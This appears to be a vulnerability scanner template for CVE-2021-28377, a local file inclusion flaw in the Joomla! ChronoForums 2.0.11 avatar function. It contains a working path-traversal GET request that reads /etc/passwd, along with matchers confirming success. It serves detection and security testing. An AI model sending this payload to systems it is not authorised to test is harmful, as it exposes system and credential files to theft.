id: CVE-2021-28377 info: name: Joomla! ChronoForums 2.0.11 - Local File Inclusion author: 0x_Akoko severity: medium description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. reference: - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00118 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 framework: joomla vendor: chronoengine product: chronoforums tags: cve,cve2021,chronoforums,lfi,joomla http: - method: GET path: - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200